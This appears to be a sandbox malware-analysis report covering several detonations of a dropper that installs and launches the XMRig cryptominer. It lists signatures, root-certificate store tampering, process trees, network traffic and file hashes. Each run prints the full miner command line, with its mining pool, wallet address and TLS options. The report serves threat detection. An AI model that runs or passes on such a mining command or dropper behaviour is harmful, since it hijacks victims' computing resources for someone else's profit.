XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 456 wrote to memory of 4060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 456 wrote to memory of 4060 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:33
Platform
win10v2004-20240226-en
Max time kernel
1796s
Max time network
1804s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1556 wrote to memory of 3568 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1556 wrote to memory of 3568 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5024 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1404 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 13.107.253.64:443 | | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 172.217.169.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 15:13
Platform
win10v2004-20240508-en
Max time kernel
1794s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2972 wrote to memory of 1100 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2972 wrote to memory of 1100 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.173.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4664 wrote to memory of 4684 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4728 wrote to memory of 3384 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-20 15:56
Reported
2024-05-22 18:29
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1020 wrote to memory of 4224 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |